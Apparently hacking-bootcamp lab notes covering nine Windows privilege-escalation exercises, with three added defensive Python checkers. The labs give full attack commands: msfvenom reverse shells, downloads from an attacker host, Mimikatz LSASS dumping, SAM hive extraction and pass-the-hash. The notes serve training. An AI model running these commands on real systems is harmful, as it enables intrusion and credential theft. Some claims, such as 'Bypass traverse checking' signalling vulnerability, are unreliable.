This document outlines the labs completed on 08/06/2025 during the hacking bootcamp, focusing on network reconnaissance and the compromise of Windows network infrastructure. It collects hints for the labs.
- Lab 1: Privilege Escalation on Windows Network
- Lab 2: Print Nightmare
- Lab 3: Privilege Escalation on Windows Network (via MSSQL)
- Lab 4: Finding Credentials in Plaintext
- Lab 5: Dump LSASS Process in Windows
- Lab 6: Dump SAM Credentials from SAM and System Database
- Lab 7: Privilege Escalation via Impersonation
- Lab 8: DLL Hijacking
- Lab 9: SeBackupPrivilege Abuse
Lab 1: Privilege Escalation on Windows Network
Escalate privileges on a Windows network by exploiting misconfigured permissions.
- Misconfigured Permissions: Excessive user privileges allow unauthorized access to administrative resources.
Target Windows server must be accessible with valid domain credentials.
- Setup
- Verify connectivity to the target server.
ping <SERVER_IP>
- Connect to the workstation via ssh
- Bruteforce the password for the user john using the rockyou.txt wordlist from seclists.
- Connect to the OpenSSH server available on the Windows machine with the recovered password.
ssh john@<TARGET_IP>
- Check for vulnerability
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- If vulnerable, it will return
AlwaysInstallElevated REG_DWORD 0x1
- Exploitation
- Generate a payload on kali with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=443 -f msi -o evil.msi
- Copy the payload to the workstation using certutil, or by serving it over a Python HTTP server.
certutil -urlcache -f http://<ATTACKER-IP>/evil.msi evil.msi
- Start a listener on Kali
nc -nlvp <PORT>
- Execute the payload (evil.msi) on the Windows machine and catch the shell. Find the flag in the Desktop directory of the user Michael.
./evil.msi
Misconfigured permissions grant low-privileged users access to sensitive resources, enabling privilege escalation.
- TO-DO
- Ensure valid credentials are available for enumeration.
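The lab's vulnerability check queries only HKCU, but Windows Installer elevates MSI installs only when AlwaysInstallElevated is 1 under both HKCU and HKLM. As an added hardening-review example (not part of the lab notes), this Python parses `reg query` output in the layout shown above for both hives and gives a verdict; the sample outputs are constructed, not captured from a real host.

```python
import re

# Constructed `reg query` results in the layout Windows prints; not captured from a real host.
HKCU_SET = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKLM_SET = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKLM_UNSET = "ERROR: The system was unable to find the specified registry key or value."

VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)")


def parse_always_install_elevated(output: str) -> int:
    """Return the DWORD from `reg query ... /v AlwaysInstallElevated` output.

    A missing key or value is reported as 0: Windows treats an unset policy as disabled."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else 0


def always_install_elevated_effective(hkcu_output: str, hklm_output: str) -> bool:
    """Windows Installer only elevates when the value is 1 under BOTH HKCU and HKLM.

    The HKCU query alone, as used in the lab, is therefore a necessary but not a
    sufficient indicator; a host with only HKCU set is not exploitable this way."""
    return (parse_always_install_elevated(hkcu_output) == 1
            and parse_always_install_elevated(hklm_output) == 1)


def audit(hkcu_output: str, hklm_output: str) -> str:
    """One-line verdict for a hardening review of the two policy values."""
    if always_install_elevated_effective(hkcu_output, hklm_output):
        return "VULNERABLE: remove AlwaysInstallElevated (or set it to 0) in both HKCU and HKLM"
    return "OK: AlwaysInstallElevated is not effective (needs 1 in both hives)"


if __name__ == "__main__":
    print(audit(HKCU_SET, HKLM_SET))
    print(audit(HKCU_SET, HKLM_UNSET))
```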
Lab 2: Print Nightmare
Exploit the Print Nightmare vulnerability to gain system-level access on a Windows machine.
- Print Nightmare (CVE-2021-34527): Unauthenticated remote code execution in the Windows Print Spooler service.
Target Windows machine must have Print Spooler service enabled and unpatched.
- Setup
- Verify connectivity to the target.
ping <TARGET_IP>
- Reconnaissance
- Confirm Print Spooler service is running. (optional)
nmap -p 445 --script smb-vuln-cve-2021-34527 <TARGET_IP>
- Check if the target is vulnerable with impacket
impacket-rpcdump <USER>:<PASSWORD>@<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'
- If found, proceed to exploitation. You can also enumerate the domain first.
impacket-lookupsid <USER>:<PASSWORD>@<TARGET_IP>
- Serve the payload directory over SMB so the exploit can fetch the DLL.
impacket-smbserver share <PATH-TO-PAYLOAD> -smb2support
- Exploitation
- Generate a payload using msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<our-ip> LPORT=<LISTENING_PORT> -f dll -o payload.dll
- Start a netcat listener
nc -nlvp <LISTENING_PORT>
- Download and use the PrintNightmare exploit to execute the malicious DLL.
python3 CVE-2021-1675.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP> '<MALICIOUS_DLL_PATH>'
python3 CVE-2021-1675.py DEKSTOP-NNMPL2T/User:123456@10.10.0.14 '\\\\<ATTACKER_IP>\\share\\payload.dll' [This is an example]
Print Nightmare exploits a flaw in the Print Spooler service, allowing unauthenticated users to execute arbitrary code with SYSTEM privileges.
- Use Metasploit’s PrintNightmare module for automated exploitation.
- Ensure the target is unpatched (pre-July 2021).
Lab 3: Privilege Escalation on Windows Network (via MSSQL)
Escalate privileges on a Windows network by exploiting MSSQL to gain a system shell.
- Weak MSSQL Credentials: Default or guessable credentials allow command execution via xp_cmdshell.
- SeImpersonate Privilege: Enables privilege escalation using SigmaPotato.
MSSQL server must be running on the target at port 1433 with weak credentials.
- Setup
- Verify connectivity to the MSSQL server.
ping 10.10.0.46
- Reconnaissance
- Brute-force MSSQL credentials using a wordlist.
hydra -C ~/SecLists/.../mssql-betterdefaultpasslist.txt 10.10.0.46 mssql -s 1433 -t 8 -f
- Exploitation
- Log in to MSSQL with obtained credentials (e.g., sa:Pass@123).
python3 mssqlclient.py sa:"Pass@123"@10.10.0.46
- Enable and use xp_cmdshell to inject a reverse shell.
enable_xp_cmdshell RECONFIGURE
- Generate a PowerShell reverse shell in base64 format on revshells.com, then start a listener.
nc -nlvp <PORT>
- Execute the base64-encoded PowerShell script from the MSSQL console.
xp_cmdshell powershell -e <BASE64_ENCODED_REVERSE_SHELL>
- When your listener catches the shell, check for SeImpersonate privilege.
whoami /priv
- Serve SigmaPotato executable via a Python server.
python3 -m http.server 80
- Download SigmaPotato to the target’s writable Public directory.
curl http://<ATTACKER_IP>/SigmaPotato.exe -o C:\Users\Public\SigmaPotato.exe
- Start a listener on a different port on your machine and execute SigmaPotato for a reverse shell.
.\SigmaPotato.exe --revshell <ATTACKER_IP> <ATTACKER_PORT>
Weak MSSQL credentials allow command execution via xp_cmdshell, and SeImpersonate privilege enables escalation to SYSTEM using SigmaPotato.
- Use Metasploit’s MSSQL module for automated shell delivery.
- MSSQL xp_cmdshell Guide: https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
- SigmaPotato: https://github.com/tylerdotrar/SigmaPotato/releases/tag/v1.2.6
- Ensure a listener is active before triggering the reverse shell.
- Download SigmaPotato and the wordlist if not already available.
Lab 4: Finding Credentials in Plaintext
Locate and crack credentials stored on a Windows system.
- Insecure Storage: Plaintext credentials in configuration files or memory.
Target Windows machine must be accessible with user-level credentials.
- Setup
- Verify access to the target system.
net use \\<TARGET_IP>
- Connect to the workstation via RDP
xfreerdp /u:<USER> /p:<PASSWORD> /v:<WORKSTATION_IP> +clipboard +home-drive
- Reconnaissance
- Search for configuration files containing credentials. You can search directories manually too. In our case, Secret.kdb was found in C:\
findstr /si "password" C:\*.config [Example]
- Exploitation
- We need to decrypt Secret.kdb. First extract the hash with keepass2john, then crack it.
keepass2john Secret.kdb > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -O --user hash.txt -m 13400 /usr/share/wordlists/rockyou.txt.gz [Alternative]
- When you obtain the password, open the database.
keepassxc Secret.kdb
- Load it as a new database and find the flag in one of the entry fields.
Weak passwords can easily be cracked with tools such as John the Ripper or hashcat.
- TO-DO.
- Check common locations like C:\Windows and C:\Users for config files.
- Install the keepassxc client if not already available.
Lab 5: Dump LSASS Process in Windows
Extract credentials by dumping the LSASS process memory on a Windows machine.
- LSASS Exposure: Unprotected LSASS process stores plaintext credentials or hashes.
Target Windows machine must be accessible with limited privileges.
- Setup
- Connect to target via rdp.
xfreerdp3 /u:<USER> /p:'<PASSWORD>' /compression /bpp:16 /v:<WORKSTATION_IP> /wallpaper /themes /window-drag /menu-anims /fonts /compression /rfx /rfx-mode:video /w:1024 /h:768 /network:auto /dynamic-resolution /drive:home,$(pwd)/www
- Download or copy mimikatz to the target workstation.
- Reconnaissance
- Confirm LSASS process is running.
tasklist | findstr lsass
- Exploitation
- Dump LSASS process using Mimikatz.
mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
- Connect to the Administrator user with the obtained password hash
xfreerdp3 /u:Administrator /pth:'<OBTAINED_HASH>' /v:<WORKSTATION_IP> +clipboard /drive:kali,/home/kali/Desktop
evil-winrm -i <WORKSTATION_IP> -u Administrator -H <OBTAINED_HASH> [Alternative]
LSASS stores credentials in memory, which Mimikatz can extract using the debug privilege.
- TO-DO
- Run Mimikatz with elevated privileges (e.g., the debug privilege) to access LSASS.
- Install or download evil-winrm if not available.
Lab 6: Dump SAM Credentials from SAM and System Database
Extract credentials from the SAM and SYSTEM registry hives on a Windows machine.
- SAM Database Exposure: Password hashes in SAM can be extracted with access.
Target Windows machine must be accessible with a user with limited permissions.
- Setup
- Connect to the machine via xfreerdp or xfreerdp3.
xfreerdp /u:<USER> /p:'<PASSWORD>' /compression /bpp:16 /v:<WORKSTATION_IP> /wallpaper /themes /window-drag /menu-anims /fonts /compression /rfx /rfx-mode:video /w:1024 /h:768 /network:auto /dynamic-resolution /drive:home,$(pwd)/www
- Check if vulnerable
- Verify the privileges of the user in a powershell console.
whoami /priv
- If Bypass traverse checking is enabled, the target is vulnerable.
- Exploitation
- Dump the sam and system database
reg save HKLM\sam sam
reg save HKLM\system system
- Copy the sam and system files to your Kali machine using a shared folder, an updog web server, or drag and drop.
- Dump SAM and SYSTEM hives using Impacket.
impacket-secretsdump -sam <PATH_TO_SAM> -system <PATH_TO_SYSTEM> LOCAL
- You will obtain the NTLM hashes for some users including Administrator. Use psexec to obtain an admin shell with the hashes, then find the flag in the desktop.
impacket-psexec -hashes :<ADMIN_PASSWORD_HASH> Administrator@<WORKSTATION_IP>
The SAM database stores user credential hashes, which can be extracted with misconfigured user privileges for offline cracking or direct login.
- TO-DO
- Save hives to a writable directory before dumping.
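The xp_cmdshell, Mimikatz and reg save steps in Labs 3, 5 and 6 all leave a process-creation trail. As an added detection example (not from the lab notes), this Python tags constructed Sysmon Event ID 1 style records (ParentImage, Image and CommandLine fields) and decodes the base64 `powershell -e` argument so an analyst can read the command that was injected through xp_cmdshell; the events and the encoded payload are constructed for the example.

```python
import base64
import re
from pathlib import PureWindowsPath
# Constructed payload: a harmless command encoded the way `powershell -e` expects (UTF-16LE, then base64).
ENCODED = base64.b64encode("Write-Output 'constructed test'".encode("utf-16le")).decode()

# Constructed process-creation records in Sysmon Event ID 1 style; none come from a real host.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": f"cmd.exe /c powershell -e {ENCODED}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\sam sam"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Users\Public\mimikatz.exe",
     "CommandLine": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
HIVE_SAVE = re.compile(r"(?i)\bsave\s+hklm\\(sam|system|security)\b")

def decode_encoded_command(cmdline: str):
    """Return the plaintext of a `powershell -e <base64>` argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event: dict) -> list:
    """Tag one record with the lab techniques it matches (empty list means nothing suspicious)."""
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    image = PureWindowsPath(event["Image"]).name.lower()
    cmd = event["CommandLine"]
    tags = []
    if parent == "sqlservr.exe" and image in {"cmd.exe", "powershell.exe"}:
        tags.append("xp_cmdshell_child")       # Lab 3: SQL Server has no business spawning a shell
    if image == "reg.exe" and HIVE_SAVE.search(cmd):
        tags.append("sam_system_hive_export")  # Lab 6: staging hives for offline secretsdump
    if "sekurlsa::" in cmd.lower():
        tags.append("lsass_credential_dump")   # Lab 5: Mimikatz LSASS module on the command line
    return tags

def scan(events: list) -> dict:
    """Index of each flagged record -> its tags plus any decoded PowerShell command."""
    tagged = ((i, classify(ev), decode_encoded_command(ev["CommandLine"])) for i, ev in enumerate(events))
    return {i: {"tags": t, "decoded": d} for i, t, d in tagged if t}
```

Running `scan(EVENTS)` flags the first three records and leaves the notepad record untouched; the decoded field of record 0 shows the plaintext that `-e` concealed.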
Lab 7: Privilege Escalation via Impersonation
Escalate privileges by exploiting token impersonation vulnerabilities.
- SeImpersonate Privilege: Allows impersonation of privileged tokens to gain SYSTEM access.
Target Windows machine must grant SeImpersonate privilege to the user.
- Setup
- Verify user privileges.
whoami /priv
- Reconnaissance
- Confirm SeImpersonate privilege is enabled.
whoami /priv | findstr SeImpersonate
- Exploitation
- Use SigmaPotato to exploit SeImpersonate for a SYSTEM shell.
- Start a netcat listener on your attacking machine.
nc -nlvp <LISTENING_PORT>
- Download SigmaPotato.exe to the workstation and run it to get a shell.
.\SigmaPotato.exe --revshell <ATTACKER_IP> <LISTENING_PORT>
SeImpersonate allows attackers to impersonate privileged tokens, escalating to SYSTEM privileges.
- Use RoguePotato or JuicyPotato for similar token impersonation exploits.
- Ensure a listener is active for the reverse shell.
Lab 8: DLL Hijacking
Escalate privileges by exploiting DLL hijacking on a Windows application. [SOLUTION IS NOT COMPLETE AT THE MOMENT: TO-DO]
- DLL Hijacking: Applications loading untrusted DLLs from writable directories.
Target Windows machine must have a vulnerable application installed.
- Setup
- Verify access to the target system.
net use \\<TARGET_IP>
- Reconnaissance
- Identify applications loading DLLs from writable paths. You will see the ITHelper program reporting that "Pentest.dll" was not found.
procmon.exe
- Exploitation
- Create a malicious Pentest.dll with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LISTENING_PORT> -f dll -o Pentest.dll
- Start a netcat listener on your attacking machine.
nc -nlvp <LISTENING_PORT>
- Place a malicious DLL in the writable directory in C:\MyProgram.
copy Pentest.dll C:\Users\<APP_PATH>
Applications loading DLLs without full path validation execute malicious DLLs, granting attacker-controlled code execution.
- Use PowerShell to monitor DLL loading behavior.
- Use Process Monitor to identify vulnerable DLL paths.
Lab 9: SeBackupPrivilege Abuse
Escalate privileges by abusing the SeBackupPrivilege to access sensitive files.
- SeBackupPrivilege: Allows users to read any file, bypassing access controls.
Target Windows machine must grant SeBackupPrivilege to the user.
- Setup
- Verify user privileges.
whoami /priv
- Find the temp user's credentials in the Public folder and connect with them.
- Reconnaissance
- Confirm SeBackupPrivilege is enabled.
whoami /priv | findstr SeBackupPrivilege
- Exploitation
- Use robocopy to copy sensitive files (e.g., SAM hive).
robocopy "C:\Users\Administrator\Desktop" "C:\Users\user_temp\Desktop" flag.txt /b /nfl /ndl /COPY:DAT
- Get the flag from the Desktop of the shared directory.
- Alternatively, you can import DLLs into PowerShell to change the file permissions as the current user (without switching accounts).
- After that, you can dump the ntlm hashes
reg save HKLM\sam sam
reg save HKLM\system system
- Copy the dumps to the attacking machine via shared folder or updog server or drag and drop if available.
- Use impacket-secretsdump to obtain the Administrator password hash.
impacket-secretsdump -sam <PATH_TO_SAM> -system <PATH_TO_SYSTEM> LOCAL
- You will obtain the NTLM hashes for some users including Administrator. Use psexec to obtain an admin shell with the hashes, then find the flag in the desktop.
impacket-psexec -hashes :<ADMIN_PASSWORD_HASH> Administrator@<WORKSTATION_IP>
SeBackupPrivilege allows reading of restricted files, enabling access to sensitive data like SAM hives for credential extraction.
- Use diskshadow to create a shadow copy for file access [NOT VERIFIED].
- Ensure a writable directory for copied files.
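Labs 3, 6, 7 and 9 all start from `whoami /priv`. As an added defender-side example (not part of the lab notes), this Python parses constructed `whoami /priv` output in the layout Windows prints and lists the held privileges that this page's labs turn into SYSTEM or credential access; SeChangeNotifyPrivilege ("Bypass traverse checking") is left off the list because every account holds it and it grants nothing on its own. The sample output is constructed, not captured from a real host.

```python
# Constructed `whoami /priv` output in the layout Windows prints (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that the labs on this page turn into SYSTEM or credential access. A low-privileged
# account should hold none of them; a Disabled state still counts, since a process can re-enable it.
HIGH_RISK = {
    "SeImpersonatePrivilege": "token impersonation to SYSTEM (Labs 3 and 7)",
    "SeBackupPrivilege": "read any file, including the SAM and SYSTEM hives (Labs 6 and 9)",
    "SeDebugPrivilege": "open LSASS and other protected processes (Lab 5)",
    "SeRestorePrivilege": "write any file and restore registry hives",
    "SeTakeOwnershipPrivilege": "take ownership of protected objects",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_priv(output: str) -> dict:
    """Return {privilege name: state}. Rows are recognised by the Se... name in the
    first column and an Enabled/Disabled state in the last one; headers are skipped."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(output: str) -> list:
    """(name, state, why it matters) for every held privilege that appears in HIGH_RISK."""
    return [(n, s, HIGH_RISK[n]) for n, s in parse_whoami_priv(output).items() if n in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in high_risk_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name} ({state}): {why}")
```

On the sample above the report names SeImpersonatePrivilege and SeBackupPrivilege only, which is exactly the pair the labs rely on.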